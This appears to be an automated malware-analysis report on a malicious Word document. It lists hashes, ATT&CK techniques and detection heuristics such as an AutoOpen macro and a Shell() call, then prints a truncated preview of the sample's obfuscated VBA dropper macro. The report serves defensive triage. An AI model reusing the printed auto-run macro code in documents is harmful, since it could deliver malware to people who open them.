Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 727942c07a800e72…

MALICIOUS

Office (OLE)

Size: 254.0 KB
Created: 2018-03-01 07:53:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 5d01e5227c8f6e9b6f5dfeebcc2a7ad2
SHA-1: 121775986e0d899803f1cba6a38d9a78e89bb44f
SHA-256: 727942c07a800e72ea2b35a34f6753310b949a7d637e4fbfa87b8f72f8f949fc
Risk Score: 204

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically when the document is opened. The macro uses a Shell() call, a critical heuristic, suggesting it attempts to download and execute a second-stage payload. Although the VBA code is heavily obfuscated, the combination of these indicators strongly points to downloader or dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6459961-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6459961-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 91055 bytes
SHA-256: e5021b905c91a161d48826aa12a26641d4d7a83a80609b983c35219eaf558998
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "pCwOYtSbkdwQM"
Sub PkKRMrccu()
   On Error Resume Next
   While WcnkWYFUcsWK < HXiFXFqwvsDAds
      Set RfPMINsvFiFLY = nUzFmDtimF
      EmbkjjsjM = 503013 + Round(cJBlPbYXRuRVHX) - 687000 * Cos(9070139) / pAjtJqDaRLVwM + Chr(MaqrpDAnRKO)
      bnRTMjoBqLTD = TwKwQCYF / FuQjNrq
   Wend
   Select Case iZiWO
      Case 3131369
         zzpJKo = HnYWE
         pBHqiNhXDfSwK = 7976670
      Case 5556562
         YzEiBAQNOuaFm = HrnBLhRonB
         luTWNAzXNPb = Rnd(3490910)
      Case 4289848
         oktbnmckaXbJ = Atn(1805154)
         vcjJCzQGzq = Fix(340145 + 8934674 * 5233361 * ZNjYRNXzXNA)
   End Select
   For GBTvuDq = 4144051 To kfSPWXhmCZ
      LuKMrCswGzEWI = 7661675 - PmBvwDFFpiOJu
      Select Case pLVnHDMqHEsLu
         Case 2960969
            fIJbiIvkHb = ChrW(FpVictwGQmjj - CSng(kjYfz))
            mIqaJ = EhQhuaOLS
         Case 9509916
            VdbwNowsw = ChrB(JrzjPnDoj)
            OMEYLiYW = 2280401
      End Select
      XinJDCWEZ = Sitn - 3887449
      For hMAvqSzinKXlh = IZCniP To 5496962
         bBbEofNRwPM = (4640404 * 6498497 + DcUPbrYKAwFBuc * Sin(RuEOAlwU - CDbl(iSRWMHZJaJVa) * 3623274 * olIQBiw) / 7513234 * CLng(7075293 - CDate(zjUHJhNEIhlI)) / CwsWvalHtw + 6068829 / (drVzpoqh / YfnRAsvQRld - LFRIIDMzdEi / Int(7895814 - Round(fpsHStubtiSFE) + 9050110 / 6590721)))
      Next
   Next
End Sub
Function EwQcdXbHDGlfEZ()
On Error Resume Next
QGGhjwDPQUr = "UzrvzmwSj!!%ijwumDmTwdoAYzCL"
SYOLEfWDfB = inkadjqmPaSw = (827013 * 1253912 + ZXDzj * Sin(OsicjCrzBw - CDbl(vGLlBpfiD) * 6689625 * TuqsH) / 7858304 * CLng(9991915 - CDate(fXIKPvFw)) / hwnObvCwuOXiYV + 6062819 / (MYjlnvDzhSzmv / qwrizFvnrwnuMa - lHCdSCWVMJ / Int(7292987 - Round(nhIwPCzYbqpXZw) + 4862666 / 6366789)))
uLmWi = zticXvLwJdsT = (5153158 * 5964151 + LLIGiCYsN * Sin(AuRfD - CDbl(dpkOQDRQl) * 9452353 * GYGEA) / 2286465 * CLng(3082203 - CDate(OoSwiZA)) / bWAuRFHPi + 8100872 / (JItsUlBR / HwziBSph - rBpPhqt / Int(7165466 - Round(jARqa) + 2025814 / 9155935)))
rZAjjA = iuivbdfghnkjgyugjn(QGGhjwDPQUr, 17, 3)
ICwXNdzcPIs = "UCmMuPwjziiYINpCwsdasQmmtpLjQrkV"
QjkIZJHJo = ZOLOzwAt = (1602031 * 2296769 + Klnma * Sin(huIjEPs - CDbl(OXTzubihBdb) * 5771829 * BqCAWrXpkpiYtw) / 2646819 * CLng(2393349 - CDate(VwSfkYhuNkU)) / jJLwNjEFih + 4647462 / (tihlaBcUV / HcLSRRVG - GDMAjW / Int(5393563 - Round(RJGBnazlFqw) + 3754006 / 2381802)))
hUdMZSE = zHRBjl = (9041083 * 2926500 + kbZRRhdBOwUL * Sin(OQTBNhL - CDbl(ZnwwEFiimq) * 7172757 * XWZOI) / 6257203 * CLng(817235 - CDate(phUrwosBih)) / NDLLocSNb + 9031075 / (cHjInrrEt / cjlsSECQMhw - SXwML / Int(7037385 - Round(qTcjRFMInAAJ) + 5594485 / 7777660)))
ohMcndDMa = iuivbdfghnkjgyugjn(ICwXNdzcPIs, 11, 4)
OhkXjzhTr = "czZVRQTEiVniAQ tes&zXitIU"
EkiKkBU = rLUwbQYR = (1063728 * 5326841 + RFCcEucYdmELJC * Sin(KDjGkOLGz - CDbl(JkAswhjEPoDkVc) * 6518156 * KzimALwEGUkzqj) / 1047268 * CLng(9653258 - CDate(dvKbjf)) / YGtOT + 5049901 / (DYmEObKwwow / iwjNjjFirhXW - SaNtRhljlh / Int(5186274 - Round(crWui) + 9476168 / 4223011)))
hGUOwvCKz = uAHrtKfNvqW = (84656 * 2999151 + vBwFhGKFsP * Sin(JHsjjN - CDbl(BqkRSWAGCXk) * 8984683 * aoBvUwY) / 3119954 * CLng(3015900 - CDate(oHsmjDniM)) / mwYqiiaFaD + 7516403 / (wEfUFzOlo / mWvKakQC - sYRYcQLR / Int(7295681 - Round(TpMhTJoGP) + 9705240 / 8074883)))
TpJoFK = iuivbdfghnkjgyugjn(OhkXjzhTr, 7, 5)
QiYoZJu = "spfkmczWwwjttnrGO%FvDsaRwRZUiCdTO"
SIizCvimEk = JJqiEsLDPsiiBw = (1881203 * 3740063 + owEfotlmj * Sin(hodKsKY - CDbl(GiwXwUZNr) * 6737336 * svdjvKiISV) / 3058273 * CLng(932366 - CDate(UiiOlhmXcZDoc)) / CjGbCCIq + 3542129 / (HhANB / CqZECS - KbJwGPWZrTtcZ / Int(2447750 - Round(NCjdLbHEhYWWW) + 2521009 / 2827854)))
BiVSsq = OjuvzsGCb = (9213977 * 5735796 + NGkctIcX * Sin(ZGODXcXkt - CDbl(MdwfsiQuUvjCQz) * 8324573 * aotdOkqBodfsc) / 
... (truncated)